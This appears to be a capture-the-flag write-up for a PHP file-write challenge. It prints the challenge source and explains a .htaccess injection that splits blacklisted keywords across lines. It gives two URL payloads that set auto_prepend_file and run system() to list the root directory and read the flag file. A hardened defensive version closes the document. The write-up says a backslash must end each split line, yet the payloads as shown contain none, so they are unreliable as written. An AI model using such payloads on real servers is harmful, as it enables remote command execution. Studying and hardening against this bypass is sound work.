0x00
Official source code
0x01
After setting up the environment, visiting the page reveals the source.
```php
<?php
// Wipe everything in the web root except index.php.
$files = scandir('./');
foreach ($files as $file) {
    if (is_file($file)) {
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
include_once("fl3g.php");
if (!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
// Case-insensitive substring blacklist on the content.
$content = $_GET['content'];
if (stristr($content, 'on') || stristr($content, 'html') || stristr($content, 'type') ||
    stristr($content, 'flag') || stristr($content, 'upload') || stristr($content, 'file')) {
    echo "Hacker";
    die();
}
// Filename may only contain lowercase letters and dots.
$filename = $_GET['filename'];
if (preg_match("/[^a-z.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
$files = scandir('./');
foreach ($files as $file) {
    if (is_file($file)) {
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
// A newline and a fixed suffix are appended to whatever is written.
file_put_contents($filename, $content . "\nJust one chance");
?>
```
A quick read of the source suggests getting command execution by writing a .htaccess file. The blacklist can be bypassed by breaking a keyword across a line break, since Apache joins a line that ends in a backslash with the next one. Also note that `\nJust one chance` is appended to the content; we only need to add a backslash ourselves to escape the newline that follows, so Apache does not return a 500.
0x02
payload:

```
/?filename=.htaccess&content=php_value%20auto_prepend_fi%0Ale%20".htaccess"%0A%23<?php%20system(%27ls%20/%27);?>%0A%23%20
/?filename=.htaccess&content=php_value%20auto_prepend_fi%0Ale%20".htaccess"%0A%23<?php%20system(%27cat /fl%0Aag%27);?>%0A%23%20
```
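For comparison, here is a hardened version of the challenge's two checks, written as an added example (not the challenge's own code). It undoes Apache's backslash-newline continuation before matching the blacklist, and replaces the permissive `[^a-z.]` filename regex with an allowlist that can never match a dotfile such as `.htaccess`; the function names and the `txt`/`md` extension allowlist are assumptions for the example.

```php
<?php
// Added example, not the challenge's code: the same blacklist, applied after
// normalizing the input the way Apache's config parser would read it.
const BLOCKED_WORDS = ['on', 'html', 'type', 'flag', 'upload', 'file'];

// True when $content contains a blocked word once backslash-newline
// continuations are joined. "auto_prepend_fi\<newline>le" becomes
// "auto_prepend_file", which a plain stristr() on the raw input misses.
function contains_blocked_word(string $content): bool {
    // Remove a backslash, optional trailing blanks, and the line break
    // that follows it, exactly the join Apache performs on .htaccess lines.
    $normalized = preg_replace('/\\\\[ \t]*\r?\n/', '', $content);
    foreach (BLOCKED_WORDS as $word) {
        if (stristr($normalized, $word) !== false) {
            return true;
        }
    }
    return false;
}

// Allowlist instead of blacklist: a short lowercase name plus one extension
// from a fixed set (assumed here). A leading dot cannot match, so
// .htaccess and other dotfiles are rejected by construction.
function filename_is_safe(string $filename): bool {
    return preg_match('/^[a-z0-9]{1,32}\.(txt|md)$/', $filename) === 1;
}

// Combined gate for the write: refuse control characters (including the
// newline the bypass depends on), then apply both checks above.
function request_is_safe(string $filename, string $content): bool {
    if (preg_match('/[\x00-\x1f\x7f]/', $content) === 1) {
        return false;
    }
    return filename_is_safe($filename) && !contains_blocked_word($content);
}

// Constructed inputs: the split keyword from the write-up, the dotfile name,
// and a benign request.
var_dump(contains_blocked_word("php_value auto_prepend_fi\\\nle \".htaccess\""));
var_dump(filename_is_safe('.htaccess'));
var_dump(request_is_safe('notes.txt', 'hello world'));
```

The first call reports the split keyword because the normalization step reassembles it; the original `stristr()` check only saw `auto_prepend_fi` and `le` on separate lines.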